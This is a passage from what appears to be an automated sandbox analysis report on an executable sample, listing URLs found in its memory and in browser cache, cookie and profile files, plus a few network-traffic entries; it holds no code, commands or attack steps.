              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
              Source: 000003.log6.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.dr, HubApps Icons.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
              Source: HubApps Icons.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
              Source: HubApps Icons.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
              Source: HubApps Icons.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
              Source: 000003.log6.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://excel.new?from=EdgeM365Shoreline
              Source: chromecache_467.4.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
              Source: chromecache_467.4.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
              Source: chromecache_467.4.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
              Source: chromecache_467.4.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://gaana.com/
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://i.y.qq.com/n2/m/index.html
              Source: 2cc80dabc69f58b6_1.8.drString found in binary or memory: https://img-s-msn-com.akamaized.net/
              Source: 2cc80dabc69f58b6_1.8.drString found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
              Source: IDHIEBAAKJDHIECAAFHC.0.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://m.kugou.com/
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://m.soundcloud.com/
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://m.vk.com/
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: https://mozilla.org0/
              Source: Cookies.9.drString found in binary or memory: https://msn.comXID/
              Source: Cookies.9.drString found in binary or memory: https://msn.comXIDv10
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://music.amazon.com
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://music.apple.com
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://music.yandex.com
              Source: 2cc80dabc69f58b6_1.8.drString found in binary or memory: https://ntp.msn.cn/edge/ntp
              Source: 000003.log3.8.dr, 2cc80dabc69f58b6_0.8.drString found in binary or memory: https://ntp.msn.com
              Source: 000003.log9.8.drString found in binary or memory: https://ntp.msn.com/
              Source: 000003.log9.8.drString found in binary or memory: https://ntp.msn.com/0
              Source: QuotaManager.8.drString found in binary or memory: https://ntp.msn.com/_default
              Source: 2cc80dabc69f58b6_1.8.dr, 000003.log9.8.drString found in binary or memory: https://ntp.msn.com/edge/ntp
              Source: 000003.log9.8.drString found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
              Source: Session_13376620169753926.8.drString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
              Source: QuotaManager.8.drString found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
              Source: 2cc80dabc69f58b6_0.8.drString found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://open.spotify.com
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://outlook.live.com/mail/0/
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://outlook.office.com/mail/0/
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
              Source: chromecache_467.4.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
              Source: 2cc80dabc69f58b6_1.8.drString found in binary or memory: https://sb.scorecardresearch.com/
              Source: 2cc80dabc69f58b6_1.8.drString found in binary or memory: https://srtb.msn.cn/
              Source: 2cc80dabc69f58b6_1.8.drString found in binary or memory: https://srtb.msn.com/
              Source: EHIJDHCAKKFCBGCBAAECFIJDAK.0.drString found in binary or memory: https://support.mozilla.org
              Source: EHIJDHCAKKFCBGCBAAECFIJDAK.0.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: EHIJDHCAKKFCBGCBAAECFIJDAK.0.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://tidal.com/
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://twitter.com/
              Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.8.drString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
              Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.8.drString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
              Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.8.drString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://vibe.naver.com/today
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://web.telegram.org/
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://web.whatsapp.com
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://word.new?from=EdgeM365Shoreline
              Source: E89hSGjVrv.exe, 00000000.00000002.2617610604.0000000023EF1000.00000004.00000020.00020000.00000000.sdmp, IDHIEBAAKJDHIECAAFHC.0.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
              Source: E89hSGjVrv.exe, 00000000.00000002.2617610604.0000000023EF1000.00000004.00000020.00020000.00000000.sdmp, IDHIEBAAKJDHIECAAFHC.0.drString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://www.deezer.com/
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: E89hSGjVrv.exe, 00000000.00000003.2265234379.0000000001680000.00000004.00000020.00020000.00000000.sdmp, BFBGDGID.0.drString found in binary or memory: https://www.ecosia.org/newtab/
              Source: content_new.js.8.dr, content.js.8.drString found in binary or memory: https://www.google.com/chrome
              Source: E89hSGjVrv.exe, 00000000.00000003.2361209484.0000000023E9C000.00000004.00000020.00020000.00000000.sdmp, E89hSGjVrv.exe, 00000000.00000003.2265234379.0000000001680000.00000004.00000020.00020000.00000000.sdmp, BFBGDGID.0.dr, Web Data.8.dr, GIJJKKJJ.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: 65b2e2f6-2ba1-45bc-a9fc-41502c757161.tmp.9.drString found in binary or memory: https://www.googleapis.com
              Source: chromecache_467.4.drString found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
              Source: chromecache_467.4.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
              Source: chromecache_467.4.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://www.iheart.com/podcast/
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://www.instagram.com
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://www.last.fm/
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://www.messenger.com
              Source: EHIJDHCAKKFCBGCBAAECFIJDAK.0.drString found in binary or memory: https://www.mozilla.org
              Source: E89hSGjVrv.exe, 00000000.00000002.2588765991.0000000000BD4000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/about/
              Source: EHIJDHCAKKFCBGCBAAECFIJDAK.0.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: E89hSGjVrv.exe, 00000000.00000002.2588765991.0000000000BD4000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/about/t.exe
              Source: E89hSGjVrv.exe, 00000000.00000002.2588765991.0000000000BD4000.00000040.00000001.01000000.00000003.sdmp, E89hSGjVrv.exe, 00000000.00000002.2588765991.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
              Source: E89hSGjVrv.exe, 00000000.00000002.2588765991.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/contribute/W1sYnpxLnB3ZA==
              Source: EHIJDHCAKKFCBGCBAAECFIJDAK.0.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: E89hSGjVrv.exe, 00000000.00000002.2588765991.0000000000BD4000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
              Source: E89hSGjVrv.exe, 00000000.00000003.2487439922.0000000024020000.00000004.00000020.00020000.00000000.sdmp, EHIJDHCAKKFCBGCBAAECFIJDAK.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: EHIJDHCAKKFCBGCBAAECFIJDAK.0.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: E89hSGjVrv.exe, 00000000.00000003.2487439922.0000000024020000.00000004.00000020.00020000.00000000.sdmp, EHIJDHCAKKFCBGCBAAECFIJDAK.0.drString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: E89hSGjVrv.exe, 00000000.00000002.2588765991.0000000000BD4000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
              Source: E89hSGjVrv.exe, 00000000.00000003.2487439922.0000000024020000.00000004.00000020.00020000.00000000.sdmp, EHIJDHCAKKFCBGCBAAECFIJDAK.0.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: E89hSGjVrv.exe, 00000000.00000002.2588765991.0000000000BD4000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
              Source: 2cc80dabc69f58b6_1.8.drString found in binary or memory: https://www.msn.com/web-notification-icon-light.png
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://www.office.com
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://www.tiktok.com/
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://www.youtube.com
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://y.music.163.com/m/
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
